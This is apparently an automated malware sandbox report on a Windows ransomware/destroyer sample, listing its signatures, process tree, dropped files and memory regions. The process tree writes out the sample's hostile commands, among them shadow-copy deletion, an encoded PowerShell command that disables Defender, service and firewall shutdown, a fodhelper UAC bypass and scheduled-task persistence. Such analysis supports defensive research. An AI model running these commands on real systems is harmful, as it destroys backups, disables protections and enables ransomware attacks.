Resubmissions

10/09/2026, 09:10

260910-k48eaaal9110

10/09/2026, 09:07

260910-k3l5na1cjc10

10/09/2026, 09:06

260910-k25wdatxcv10

10/09/2026, 09:02

260910-kzl1gsal6y10

10/09/2026, 08:59

260910-kx8rgaal5v10

10/09/2026, 08:54

260910-ktygbsak9t10

10/09/2026, 05:25

260910-f4gjca1xay10

Analysis

  • user interaction
    yes
  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    10/09/2026, 09:07

General

  • Target
    2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
  • Size 49KB
  • Sample260910-k3l5na1cjc
  • SHA256 0b282b239973de2c524ad3fe95e33aaf5ce6f2739ed0cdf4c13ac3029b94f07b
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Creates a file in the Startup directory 1 TTPs 64 IoCs

    A file was written to a Windows startup folder. Files in these directories are executed automatically when a user logs on or an application initializes.

  • Disables service(s) 3 TTPs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Stops running service(s) 4 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Discovers running processes 1 TTPs 1 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Drops file in System32 directory 4 IoCs
  • Executes a VBScript file via the Windows Script Host. 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Executes a command shell one-liner 1 TTPs 8 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 1 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 16 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f && reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLogoff /t REG_DWORD /d 1 /f && reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f && timeout /t 5 /nobreak && C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe"
    1⤵
    • Executes a command shell one-liner
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:4912
    • C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLogoff /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:6096
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:2140
    • C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      2⤵
      • Delays execution with timeout.exe
      PID:5416
    • C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
      C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
      2⤵
      • Modifies Windows Defender DisableAntiSpyware settings
      • Disables RegEdit via registry modification
      • Drops file in Drivers directory
      • Creates a file in the Startup directory
      • Adds Run key to start application
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Modifies Control Panel
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA=
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2788
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop wscsvc
        3⤵
        • Launches sc.exe
        PID:3536
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config wscsvc start= disabled
        3⤵
        • Launches sc.exe
        PID:3948
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop SecurityHealthService
        3⤵
        • Launches sc.exe
        PID:1892
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config SecurityHealthService start= disabled
        3⤵
        • Launches sc.exe
        PID:4772
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop WinDefend
        3⤵
        • Launches sc.exe
        PID:1120
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        PID:2848
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop MsMpSvc
        3⤵
        • Launches sc.exe
        PID:2052
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config MsMpSvc start= disabled
        3⤵
        • Launches sc.exe
        PID:3704
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3660
        • C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
          "C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe"
          4⤵
            PID:4496
        • C:\Windows\System32\wscript.exe
          "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
          3⤵
          • Executes a VBScript file via the Windows Script Host.
          PID:2320
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "SysUpdateTask" /tr "C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe" /sc onlogon /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5708
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\del.bat" "
          3⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:2400
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:964
        • C:\Windows\System32\notepad.exe
          "C:\Windows\System32\notepad.exe"
          3⤵
            PID:4104
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c systeminfo > "C:\ProgramData\SysUpdate\Logs\sysinfo.txt"
            3⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:5068
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:5760
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c tasklist > "C:\ProgramData\SysUpdate\Logs\tasklist.txt"
            3⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:5564
            • C:\Windows\system32\tasklist.exe
              tasklist
              4⤵
              • Discovers running processes
              • Suspicious use of AdjustPrivilegeToken
              PID:1328
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c whoami > "C:\ProgramData\SysUpdate\Logs\whoami.txt"
            3⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:4572
            • C:\Windows\system32\whoami.exe
              whoami
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5368
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c net user > "C:\ProgramData\SysUpdate\Logs\netuser.txt"
            3⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\system32\net.exe
              net user
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3692
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                5⤵
                  PID:4240
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ipconfig /all > "C:\ProgramData\SysUpdate\Logs\ipconfig.txt"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:4760
              • C:\Windows\system32\ipconfig.exe
                ipconfig /all
                4⤵
                • Gathers network information
                PID:1900
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c netstat -an > "C:\ProgramData\SysUpdate\Logs\netstat.txt"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:3152
              • C:\Windows\system32\NETSTAT.EXE
                netstat -an
                4⤵
                • Gathers network information
                PID:5412
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "RansomwareCheck" /tr "C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe" /sc daily /f
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3960
            • C:\Windows\System32\wscript.exe
              "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
              3⤵
              • Executes a VBScript file via the Windows Script Host.
              PID:5268
            • C:\Windows\System32\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
              3⤵
              • Interacts with shadow copies
              PID:4660
            • C:\Windows\System32\wbem\WMIC.exe
              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6008
            • C:\Windows\System32\net.exe
              "C:\Windows\System32\net.exe" stop srservice
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:6068
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop srservice
                4⤵
                  PID:5212
              • C:\Windows\System32\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:1812
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" config i8042prt start= disabled
                3⤵
                • Launches sc.exe
                PID:3652
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" stop i8042prt
                3⤵
                • Launches sc.exe
                PID:1268
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x0 /state0:0xa3a24055 /state1:0x41c64e6d
            1⤵
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1140
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k CameraMonitor
            1⤵
              PID:4976
            • C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
              C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
              1⤵
                PID:5968
              • C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
                C:\Users\Admin\AppData\Local\Temp\2026-09-08_5e75aa5e8e9763fcaa299dd4ae659df0_destroyer_elex_glassworm_ngrbot_wannacry.exe
                1⤵
                  PID:5072
                • C:\Windows\system32\ctfmon.exe
                  /QuitInfo:0000000000000188;000000000000018C;
                  1⤵
                  • Modifies data under HKEY_USERS
                  PID:4472
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                    PID:3448
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k GPSvcGroup
                    1⤵
                      PID:1884

                    Network

                          MITRE ATT&CK Enterprise v16

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          invoice_1.pdf

                          • Path C:\ProgramData\invoice_1.pdf
                          • Size 66KB
                          • SHA256 6a5e23002740355ef212dc6a907f60dae9c191a2eeec5038621c5f8d9ae42302
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          doc_3.pdf

                          • Path C:\SystemVolumeInformation\doc_3.pdf
                          • Size 66KB
                          • SHA256 72e72c966c4d7e84223b23db9626a3ecfe5fb7ca9a0e4416250cc0d288993360
                          • MD5 SHA1 SHA512 SSDEEP TLSH

                          createshortcut.vbs

                          • Path C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
                          • Size 309B
                          • SHA256 2ada5083baf03d0d9669ee30a4fb4147088c13c89565847659a88164432fe726
                          • MD5 SHA1 SHA512 TLSH

                          del.bat

                          • Path C:\Users\Admin\AppData\Local\Temp\del.bat
                          • Size 59B
                          • SHA256 a51f2a0f053ac35b4158bb02b75421ab3698e1d0ee4f926abf1bae3af1570c53
                          • MD5 SHA1 SHA512 TLSH

                          makelnk.vbs

                          • Path C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
                          • Size 310B
                          • SHA256 0fd4e1f5a4297662f7e9783730600cd8d894caa5dde8135af3e3522556e94d27
                          • MD5 SHA1 SHA512 TLSH

                          memory/2788-18-0x0000024E8D390000-0x0000024E8D3B2000-memory.dmp

                          memory/2788-672-0x0000024E8D490000-0x0000024E8D49A000-memory.dmp

                          memory/2788-295-0x0000024EA5CC0000-0x0000024EA5D72000-memory.dmp

                          memory/2788-286-0x0000024E8D470000-0x0000024E8D48E000-memory.dmp

                          memory/4104-2240-0x0000020B5F590000-0x0000020B5F591000-memory.dmp

                          memory/4184-9-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-3-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-13-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-11-0x000000001E6A0000-0x000000001E862000-memory.dmp

                          memory/4184-10-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-0-0x00007FF8B90BF000-0x00007FF8B90C0000-memory.dmp

                          memory/4184-8-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-7-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-4-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-12-0x000000001EE80000-0x000000001F3A8000-memory.dmp

                          memory/4184-2-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2245-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-1-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

                          memory/4184-2247-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2249-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2252-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2253-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2255-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2259-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp

                          memory/4184-2258-0x00007FF8B8F30000-0x00007FF8B98D4000-memory.dmp